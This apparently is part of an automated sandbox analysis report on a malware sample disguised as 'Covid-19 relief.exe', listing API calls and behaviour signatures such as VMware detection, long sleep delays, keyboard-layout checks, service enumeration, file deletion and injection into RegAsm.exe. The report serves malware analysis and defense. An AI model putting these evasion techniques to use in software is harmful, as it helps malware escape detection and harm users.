            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_004113C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_004113C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,5_2_004113C9
            Source: C:\Users\user\Desktop\Covid-19 relief.exeWindow / User API: threadDelayed 389Jump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeWindow / User API: threadDelayed 2446Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 747Jump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeWindow / User API: threadDelayed 1706Jump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeWindow / User API: threadDelayed 389Jump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeWindow / User API: threadDelayed 2446Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 747Jump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeWindow / User API: threadDelayed 1706Jump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exe TID: 5616Thread sleep time: -48920s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4116Thread sleep count: 747 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4116Thread sleep time: -7470000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exe TID: 5948Thread sleep count: 321 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exe TID: 6604Thread sleep count: 1706 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exe TID: 6604Thread sleep time: -34120s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exe TID: 5616Thread sleep time: -48920s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4116Thread sleep count: 747 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4116Thread sleep time: -7470000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exe TID: 5948Thread sleep count: 321 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exe TID: 6604Thread sleep count: 1706 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exe TID: 6604Thread sleep time: -34120s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh2_2_00405156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040517Bh2_2_00405156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh2_2_00405156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040517Bh2_2_00405156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh5_2_00405156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040517Bh5_2_00405156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00404C0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_0040751B
